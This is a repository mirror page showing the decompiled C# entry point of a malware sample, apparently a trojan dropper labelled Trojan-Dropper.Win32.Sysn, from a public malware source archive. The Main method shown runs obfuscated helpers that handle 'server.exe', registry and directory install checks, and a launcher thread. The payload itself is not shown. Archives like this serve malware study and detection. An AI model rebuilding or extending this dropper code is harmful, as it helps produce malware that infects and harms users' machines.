mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-19 09:56:10 +00:00
f2ac1ece55
add
24 lines
697 B
C#
24 lines
697 B
C#
// Decompiled with JetBrains decompiler
|
|
// Type: FTPscanner.Program
|
|
// Assembly: FTPscanner, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 8469568A-499F-4FFB-88BB-33DD24B78A55
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-Dropper.Win32.Sysn.axrz-65a382451dd46ba81b5db9e85a6a586162c5d430c853bf4f688f48a71af44313.exe
|
|
|
|
using System.Threading;
|
|
|
|
namespace FTPscanner
|
|
{
|
|
internal class Program
|
|
{
|
|
private static void Main(string[] args)
|
|
{
|
|
C1.A("server.exe", false);
|
|
C1.B();
|
|
C1.C();
|
|
Install.RegistryCheck();
|
|
Install.DirectoryCheck();
|
|
new Thread(new ThreadStart(Launcher.Start)).Start();
|
|
}
|
|
}
|
|
}
|